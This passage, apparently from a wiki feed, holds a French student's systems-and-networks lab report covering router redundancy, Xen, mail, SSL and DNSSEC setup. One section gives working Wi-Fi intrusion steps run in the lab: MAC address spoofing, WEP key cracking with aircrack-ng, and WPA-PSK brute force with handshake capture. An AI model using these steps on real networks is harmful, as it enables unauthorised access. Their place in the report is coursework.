&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Sécurisation de serveur DNS par DNSSEC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/bind&lt;br /&gt;
vim named.conf.options ==&amp;gt; rajout de l'option dnssec-enable yes;&lt;br /&gt;
mkdir hunt3r.dnssec&lt;br /&gt;
cd hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
Je renomme les fichiers créé en : &lt;br /&gt;
    *hunt3r-ksk.key&lt;br /&gt;
    *hunt3r-ksk.private&lt;br /&gt;
    *hunt3r-zsk.key&lt;br /&gt;
    *hunt3r-zsk.private&lt;br /&gt;
J'inclus dans le fichier db.hunt3r : &lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key&lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key&lt;br /&gt;
dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23155</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23155"/>
				<updated>2015-11-23T16:08:48Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;default&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
